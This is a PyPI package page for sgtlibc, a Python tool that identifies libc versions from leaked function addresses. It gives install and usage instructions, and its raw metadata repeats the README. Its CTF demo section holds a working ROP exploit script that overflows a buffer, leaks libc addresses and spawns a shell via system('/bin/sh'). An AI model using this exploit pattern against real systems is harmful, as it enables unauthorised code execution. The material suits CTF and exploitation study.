sgtlibc


Namesgtlibc JSON
Version 1.16.0 PyPI version JSON
download
home_pagehttps://github.com/serfend/sgtlibc
Summarya offline python-lib for search libc function.for search version of libc.you can use like:`sgtlibc puts:aa0+read:140 --dump system binsh` or in python , like : `py:import sgtlibc;s = sgtlibc.LibcSearcher();s.add_condition('puts',0xaa0)`
upload_time2023-08-10 15:46:05
maintainer
docs_urlNone
authorserfend
requires_python>=3.7, <4
licenseMIT Licence
keywords libcsearcher
VCS
bugtrack_url
requirements No requirements were recorded.
Travis-CI No Travis.
coveralls test coverage No coveralls.
            

<p align="center">
    <a href="https://visitorbadge.io/status?path=https%3A%2F%2Fgithub.com%2Fserfend%2Fsgtlibc%2F"><img src="https://api.visitorbadge.io/api/visitors?path=https%3A%2F%2Fgithub.com%2Fserfend%2Fsgtlibc%2F&labelColor=%23697689&countColor=%23ff8a65&style=plastic&labelStyle=none" /></a>
    <a href="https://pypi.python.org/pypi/sgtlibc/"><img alt="pypi version" src="https://img.shields.io/pypi/v/sgtlibc.svg" /></a> 
    <a href="https://pypistats.org/packages/sgtlibc"><img alt="pypi download" src="https://img.shields.io/pypi/dm/sgtlibc.svg" /></a>
    <a href="https://github.com/serfend/sgtlibc/releases"><img alt="GitHub release" src="https://img.shields.io/github/release/serfend/sgtlibc.svg?style=flat-square" /></a>
    <a href="https://github.com/serfend/sgtlibc/releases"><img alt="GitHub All Releases" src="https://img.shields.io/github/downloads/serfend/sgtlibc/total.svg?style=flat-square&color=%2364ff82" /></a>
    <a href="https://github.com/serfend/sgtlibc/commits"><img alt="GitHub last commit" src="https://img.shields.io/github/last-commit/serfend/sgtlibc.svg?style=flat-square" /></a>
    <!-- <a href="https://github.com/serfend/sgtlibc/actions/workflows/pytest.yml"><img alt="GitHub Workflow Status" src="https://github.com/serfend/sgtlibc/actions/workflows/pytest.yml/badge.svg" /></a> -->
</p>





![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)![Ubuntu](https://img.shields.io/badge/Ubuntu-E95420?style=for-the-badge&logo=ubuntu&logoColor=white)![Kali](https://img.shields.io/badge/Kali-268BEE?style=for-the-badge&logo=kalilinux&logoColor=white)![FreeBSD](https://img.shields.io/badge/-FreeBSD-%23870000?style=for-the-badge&logo=freebsd&logoColor=white)![Deepin](https://img.shields.io/badge/Deepin-007CFF?style=for-the-badge&logo=deepin&logoColor=white)![Debian](https://img.shields.io/badge/Debian-D70A53?style=for-the-badge&logo=debian&logoColor=white)![Cent OS](https://img.shields.io/badge/cent%20os-002260?style=for-the-badge&logo=centos&logoColor=F0F0F0)

# What?

[sgtlibc](https://github.com/serfend/sgtlibc) is a a offline python-lib for search libc function.



## Install

```shell
pip install sgtlibc
```



## Usage

```shell
usage: sgtlibc [-h] [-d [DUMP ...]] [-i [INDEX]] [-s [SYMBOLS]] [-u [UPDATE]] [-v [VERSION]] [funcs_with_addresses]

a offline python-lib for search libc function.for search version of libc.you can use like:`sgtlibc puts:aa0+read:140 --dump system binsh` or in python , like : `py:import sgtlibc;s =
sgtlibc.LibcSearcher();s.add_condition('puts',0xaa0)`

positional arguments:
  funcs_with_addresses  specify `func-name` and `func address` , split by `|`,eg: puts:aa0+read:140 , its means func-puts address = 0xaa0;func-read address = 0x140 (default: None).

options:
  -h, --help            show this help message and exit
  -d [DUMP ...], --dump [DUMP ...]
                        select funcs to dump its info (default: ['__libc_start_main_ret', 'system', 'dup2', 'read', 'write', 'str_bin_sh']).
  -i [INDEX], --index [INDEX]
                        db index on multi-database found occation (default: 0).
  -s [SYMBOLS], --symbols [SYMBOLS]
                        convert libc-elf file to symbols-file,use `libc_path [alias]` to convert.
  -u [UPDATE], --update [UPDATE]
                        update current libc database from internet , need non-microsoft-windows environment (default: False).
  -v [VERSION], --version [VERSION]
                        show version
```





## Quick Start

- in cmd.exe` or `/bin/sh`

```shell
sgtlibc puts:aa0
sgtlibc puts:aa0+read:140
sgtlibc puts:aa0+read:140 --dump system binsh
```

- in `python3`

```python
import sgtlibc
s = sgtlibc.Searcher()
s.add_condition('puts', 0xaa0)
s.add_condition('read',0x140)
print(s.dump())
print(s.dump(['system','str_bin_sh']))
```



## Example

- `main args` specify `func-name` and `func address` ,**SHOULD split by `|` **

  eg: `puts:aa0+read:140` which means:

  - func-`puts` address = `0xaa0`
  - func-`read` address =` 0x140`

- `--update` is for update libc database from internet base on `libc-database` , **require non-microsoft-window**  system

### python run

- run [python code above](/#/Quick Start) , you'll get output-result like following shows:

![image-20220605212842313](https://raw.githubusercontent.com/serfend/res.image.reference/main/image-20220605212842313.png)

### command run

- run command in terminal , you'll get output-result like following shows:

  ![image-20220605213023151](https://raw.githubusercontent.com/serfend/res.image.reference/main/image-20220605213023151.png)

### pwntools run

- use in `pwntools`

```python
from pwn import * # should run pip install pwntools before
import sgtlibc
s = libc.Searcher()
puts_addr = 0xf71234567aa0 # from leak data
s.add_condition('puts',puts_addr)
s.dump(db_index=0) # search libc , if returns multi-result ,default use index-0's result
system_addr = p00(s.get_address(sgtlibc.s_system))
binsh_addr = p00(s.get_address(sgtlibc.s_binsh))
```



### use user-libc database

> search libc from user-directory

```python
from sgtlibc.utils import configuration as config
def test_use_user_libc():
    lib_path = './libs' # here input your libc directory
    config.set(config.extension_database_path, lib_path)
    s = LibcSearcher('puts', 0xf7007)
    s.decided()
```



### add user-libc database

> add a libc.so file to database

```bash
sgtlibc -s ./libc.from_user.so:alias_input_here
```

or

```python
from sgtlibc.main import do_symbols
do_symbols(f'./libc.from_user.so:alias_input_here')
```

## CTF Problem Solve DEMO

[view all sameple files](https://github.com/serfend/sgtlibc/tree/main/samples/libc-leak/x64-babyrop)

- use exploit code

```python
import sgtlibc
from sgtlibc.gamebox import *
set_config(GameBoxConfig(
    is_local=True, file='./babyrop2', remote='192.168.0.1:25462',
    auto_load=True,
    auto_show_rop=True,
    auto_show_summary=True,
    auto_start_game=True,
    auto_load_shell_str=True,
    auto_show_symbols=True
))
s = sgtlibc.Searcher()
elf = client.elf
def exp():
	payload_exp = [b'a' * (28 + 4),fakeebp()] # overflow position
    return payload_exp
def leak(func: str):
    payload = exp()
    # here will auto-pack to p64, you can use p64 or p00 as same effect.
    payload += [elf.rop['rdi'],elf.got[func],elf.plt['printf'],elf.symbols['main']]
    sl(payload)
    rl()
    data = rc(6).ljust(8, b'\0')
    data = uc(data)
    s.add_condition(func, data)
    return data
leak('printf')
leak('read')
data = s.dump(db_index=2)  # choose your system index
system_addr = s.get_address(sgtlibc.s_system)
binsh_addr = s.get_address(sgtlibc.s_binsh)
log.info(f'system_addr:{hex(system_addr)}')
log.info(f'binsh_addr:{hex(binsh_addr)}')
payload = exp() 
payload += [elf.rop['rdi'],binsh_addr,system_addr, fakeebp()]
    
sl(payload)
interactive()
```

- result

![image-20220609134743902](https://raw.githubusercontent.com/serfend/res.image.reference/main/image-20220609134743902.png)





## Notice

> default libc database is update on `2022-06-01`,which long-time ago , we fully recommanded to update it by run `sgtlibc --update`



## Status

![Alt](https://repobeats.axiom.co/api/embed/7d8920fddffed00ee7feb8d172bc7b48c86da3b8.svg "Repobeats analytics image")

            

Raw data

            {
    "_id": null,
    "home_page": "https://github.com/serfend/sgtlibc",
    "name": "sgtlibc",
    "maintainer": "",
    "docs_url": null,
    "requires_python": ">=3.7, <4",
    "maintainer_email": "",
    "keywords": "libcsearcher",
    "author": "serfend",
    "author_email": "serfend@foxmail.com",
    "download_url": "https://files.pythonhosted.org/packages/f2/ba/a379a21402c2c874f74bfbb193e7af50d7e5681897a8c66a57cd4349c32f/sgtlibc-1.16.0.tar.gz",
    "platform": "any",
    "description": "\n\n<p align=\"center\">\n    <a href=\"https://visitorbadge.io/status?path=https%3A%2F%2Fgithub.com%2Fserfend%2Fsgtlibc%2F\"><img src=\"https://api.visitorbadge.io/api/visitors?path=https%3A%2F%2Fgithub.com%2Fserfend%2Fsgtlibc%2F&labelColor=%23697689&countColor=%23ff8a65&style=plastic&labelStyle=none\" /></a>\n    <a href=\"https://pypi.python.org/pypi/sgtlibc/\"><img alt=\"pypi version\" src=\"https://img.shields.io/pypi/v/sgtlibc.svg\" /></a> \n    <a href=\"https://pypistats.org/packages/sgtlibc\"><img alt=\"pypi download\" src=\"https://img.shields.io/pypi/dm/sgtlibc.svg\" /></a>\n    <a href=\"https://github.com/serfend/sgtlibc/releases\"><img alt=\"GitHub release\" src=\"https://img.shields.io/github/release/serfend/sgtlibc.svg?style=flat-square\" /></a>\n    <a href=\"https://github.com/serfend/sgtlibc/releases\"><img alt=\"GitHub All Releases\" src=\"https://img.shields.io/github/downloads/serfend/sgtlibc/total.svg?style=flat-square&color=%2364ff82\" /></a>\n    <a href=\"https://github.com/serfend/sgtlibc/commits\"><img alt=\"GitHub last commit\" src=\"https://img.shields.io/github/last-commit/serfend/sgtlibc.svg?style=flat-square\" /></a>\n    <!-- <a href=\"https://github.com/serfend/sgtlibc/actions/workflows/pytest.yml\"><img alt=\"GitHub Workflow Status\" src=\"https://github.com/serfend/sgtlibc/actions/workflows/pytest.yml/badge.svg\" /></a> -->\n</p>\n\n\n\n\n\n![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)![Ubuntu](https://img.shields.io/badge/Ubuntu-E95420?style=for-the-badge&logo=ubuntu&logoColor=white)![Kali](https://img.shields.io/badge/Kali-268BEE?style=for-the-badge&logo=kalilinux&logoColor=white)![FreeBSD](https://img.shields.io/badge/-FreeBSD-%23870000?style=for-the-badge&logo=freebsd&logoColor=white)![Deepin](https://img.shields.io/badge/Deepin-007CFF?style=for-the-badge&logo=deepin&logoColor=white)![Debian](https://img.shields.io/badge/Debian-D70A53?style=for-the-badge&logo=debian&logoColor=white)![Cent OS](https://img.shields.io/badge/cent%20os-002260?style=for-the-badge&logo=centos&logoColor=F0F0F0)\n\n# What?\n\n[sgtlibc](https://github.com/serfend/sgtlibc) is a a offline python-lib for search libc function.\n\n\n\n## Install\n\n```shell\npip install sgtlibc\n```\n\n\n\n## Usage\n\n```shell\nusage: sgtlibc [-h] [-d [DUMP ...]] [-i [INDEX]] [-s [SYMBOLS]] [-u [UPDATE]] [-v [VERSION]] [funcs_with_addresses]\n\na offline python-lib for search libc function.for search version of libc.you can use like:`sgtlibc puts:aa0+read:140 --dump system binsh` or in python , like : `py:import sgtlibc;s =\nsgtlibc.LibcSearcher();s.add_condition('puts',0xaa0)`\n\npositional arguments:\n  funcs_with_addresses  specify `func-name` and `func address` , split by `|`,eg: puts:aa0+read:140 , its means func-puts address = 0xaa0;func-read address = 0x140 (default: None).\n\noptions:\n  -h, --help            show this help message and exit\n  -d [DUMP ...], --dump [DUMP ...]\n                        select funcs to dump its info (default: ['__libc_start_main_ret', 'system', 'dup2', 'read', 'write', 'str_bin_sh']).\n  -i [INDEX], --index [INDEX]\n                        db index on multi-database found occation (default: 0).\n  -s [SYMBOLS], --symbols [SYMBOLS]\n                        convert libc-elf file to symbols-file,use `libc_path [alias]` to convert.\n  -u [UPDATE], --update [UPDATE]\n                        update current libc database from internet , need non-microsoft-windows environment (default: False).\n  -v [VERSION], --version [VERSION]\n                        show version\n```\n\n\n\n\n\n## Quick Start\n\n- in cmd.exe` or `/bin/sh`\n\n```shell\nsgtlibc puts:aa0\nsgtlibc puts:aa0+read:140\nsgtlibc puts:aa0+read:140 --dump system binsh\n```\n\n- in `python3`\n\n```python\nimport sgtlibc\ns = sgtlibc.Searcher()\ns.add_condition('puts', 0xaa0)\ns.add_condition('read',0x140)\nprint(s.dump())\nprint(s.dump(['system','str_bin_sh']))\n```\n\n\n\n## Example\n\n- `main args` specify `func-name` and `func address` ,**SHOULD split by `|` **\n\n  eg: `puts:aa0+read:140` which means:\n\n  - func-`puts` address = `0xaa0`\n  - func-`read` address =` 0x140`\n\n- `--update` is for update libc database from internet base on `libc-database` , **require non-microsoft-window**  system\n\n### python run\n\n- run [python code above](/#/Quick Start) , you'll get output-result like following shows:\n\n![image-20220605212842313](https://raw.githubusercontent.com/serfend/res.image.reference/main/image-20220605212842313.png)\n\n### command run\n\n- run command in terminal , you'll get output-result like following shows:\n\n  ![image-20220605213023151](https://raw.githubusercontent.com/serfend/res.image.reference/main/image-20220605213023151.png)\n\n### pwntools run\n\n- use in `pwntools`\n\n```python\nfrom pwn import * # should run pip install pwntools before\nimport sgtlibc\ns = libc.Searcher()\nputs_addr = 0xf71234567aa0 # from leak data\ns.add_condition('puts',puts_addr)\ns.dump(db_index=0) # search libc , if returns multi-result ,default use index-0's result\nsystem_addr = p00(s.get_address(sgtlibc.s_system))\nbinsh_addr = p00(s.get_address(sgtlibc.s_binsh))\n```\n\n\n\n### use user-libc database\n\n> search libc from user-directory\n\n```python\nfrom sgtlibc.utils import configuration as config\ndef test_use_user_libc():\n    lib_path = './libs' # here input your libc directory\n    config.set(config.extension_database_path, lib_path)\n    s = LibcSearcher('puts', 0xf7007)\n    s.decided()\n```\n\n\n\n### add user-libc database\n\n> add a libc.so file to database\n\n```bash\nsgtlibc -s ./libc.from_user.so:alias_input_here\n```\n\nor\n\n```python\nfrom sgtlibc.main import do_symbols\ndo_symbols(f'./libc.from_user.so:alias_input_here')\n```\n\n## CTF Problem Solve DEMO\n\n[view all sameple files](https://github.com/serfend/sgtlibc/tree/main/samples/libc-leak/x64-babyrop)\n\n- use exploit code\n\n```python\nimport sgtlibc\nfrom sgtlibc.gamebox import *\nset_config(GameBoxConfig(\n    is_local=True, file='./babyrop2', remote='192.168.0.1:25462',\n    auto_load=True,\n    auto_show_rop=True,\n    auto_show_summary=True,\n    auto_start_game=True,\n    auto_load_shell_str=True,\n    auto_show_symbols=True\n))\ns = sgtlibc.Searcher()\nelf = client.elf\ndef exp():\n\tpayload_exp = [b'a' * (28 + 4),fakeebp()] # overflow position\n    return payload_exp\ndef leak(func: str):\n    payload = exp()\n    # here will auto-pack to p64, you can use p64 or p00 as same effect.\n    payload += [elf.rop['rdi'],elf.got[func],elf.plt['printf'],elf.symbols['main']]\n    sl(payload)\n    rl()\n    data = rc(6).ljust(8, b'\\0')\n    data = uc(data)\n    s.add_condition(func, data)\n    return data\nleak('printf')\nleak('read')\ndata = s.dump(db_index=2)  # choose your system index\nsystem_addr = s.get_address(sgtlibc.s_system)\nbinsh_addr = s.get_address(sgtlibc.s_binsh)\nlog.info(f'system_addr:{hex(system_addr)}')\nlog.info(f'binsh_addr:{hex(binsh_addr)}')\npayload = exp() \npayload += [elf.rop['rdi'],binsh_addr,system_addr, fakeebp()]\n    \nsl(payload)\ninteractive()\n```\n\n- result\n\n![image-20220609134743902](https://raw.githubusercontent.com/serfend/res.image.reference/main/image-20220609134743902.png)\n\n\n\n\n\n## Notice\n\n> default libc database is update on `2022-06-01`,which long-time ago , we fully recommanded to update it by run `sgtlibc --update`\n\n\n\n## Status\n\n![Alt](https://repobeats.axiom.co/api/embed/7d8920fddffed00ee7feb8d172bc7b48c86da3b8.svg \"Repobeats analytics image\")\n",
    "bugtrack_url": null,
    "license": "MIT Licence",
    "summary": "a offline python-lib for search libc function.for search version of libc.you can use like:`sgtlibc puts:aa0+read:140 --dump system binsh` or in python , like : `py:import sgtlibc;s = sgtlibc.LibcSearcher();s.add_condition('puts',0xaa0)`",
    "version": "1.16.0",
    "project_urls": {
        "Homepage": "https://github.com/serfend/sgtlibc"
    },
    "split_keywords": [
        "libcsearcher"
    ],
    "urls": [
        {
            "comment_text": "",
            "digests": {
                "blake2b_256": "00504a6f2ff9448848bd785508c1e722b8ed587c1749a3ac1516781ff775078a",
                "md5": "f3c2bd826ae2bde51a8292acb8fd43e1",
                "sha256": "923bd978608d96995318b7071ba5798d091fb853dbb494e58ea4082c6f166610"
            },
            "downloads": -1,
            "filename": "sgtlibc-1.16.0-py3-none-any.whl",
            "has_sig": false,
            "md5_digest": "f3c2bd826ae2bde51a8292acb8fd43e1",
            "packagetype": "bdist_wheel",
            "python_version": "py3",
            "requires_python": ">=3.7, <4",
            "size": 21498723,
            "upload_time": "2023-08-10T15:46:02",
            "upload_time_iso_8601": "2023-08-10T15:46:02.742497Z",
            "url": "https://files.pythonhosted.org/packages/00/50/4a6f2ff9448848bd785508c1e722b8ed587c1749a3ac1516781ff775078a/sgtlibc-1.16.0-py3-none-any.whl",
            "yanked": false,
            "yanked_reason": null
        },
        {
            "comment_text": "",
            "digests": {
                "blake2b_256": "f2baa379a21402c2c874f74bfbb193e7af50d7e5681897a8c66a57cd4349c32f",
                "md5": "4c82d1a4d0808616697c160443cbf302",
                "sha256": "e1d6e7add0915a71e08f690a64c3113e36c0ccdec26162ac4ad4e26161f133b5"
            },
            "downloads": -1,
            "filename": "sgtlibc-1.16.0.tar.gz",
            "has_sig": false,
            "md5_digest": "4c82d1a4d0808616697c160443cbf302",
            "packagetype": "sdist",
            "python_version": "source",
            "requires_python": ">=3.7, <4",
            "size": 20780588,
            "upload_time": "2023-08-10T15:46:05",
            "upload_time_iso_8601": "2023-08-10T15:46:05.839937Z",
            "url": "https://files.pythonhosted.org/packages/f2/ba/a379a21402c2c874f74bfbb193e7af50d7e5681897a8c66a57cd4349c32f/sgtlibc-1.16.0.tar.gz",
            "yanked": false,
            "yanked_reason": null
        }
    ],
    "upload_time": "2023-08-10 15:46:05",
    "github": true,
    "gitlab": false,
    "bitbucket": false,
    "codeberg": false,
    "github_user": "serfend",
    "github_project": "sgtlibc",
    "travis_ci": false,
    "coveralls": false,
    "github_actions": true,
    "requirements": [],
    "lcname": "sgtlibc"
}
        
Elapsed time: 0.10392s